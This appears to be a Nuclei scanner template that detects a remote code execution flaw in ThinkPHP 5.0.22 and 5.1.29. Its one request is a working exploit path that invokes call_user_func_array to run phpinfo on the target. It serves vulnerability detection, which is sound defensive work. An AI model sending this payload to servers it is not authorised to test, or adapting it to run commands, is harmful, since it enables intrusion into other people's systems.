32 lines
1012 B
YAML
32 lines
1012 B
YAML
id: thinkphp-5022-rce
|
|
|
|
info:
|
|
name: ThinkPHP - Remote Code Execution
|
|
author: dr_set
|
|
severity: critical
|
|
description: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
|
|
tags: thinkphp,rce
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "PHP Extension"
|
|
- "PHP Version"
|
|
- "ThinkPHP"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by md on 2022/10/05
|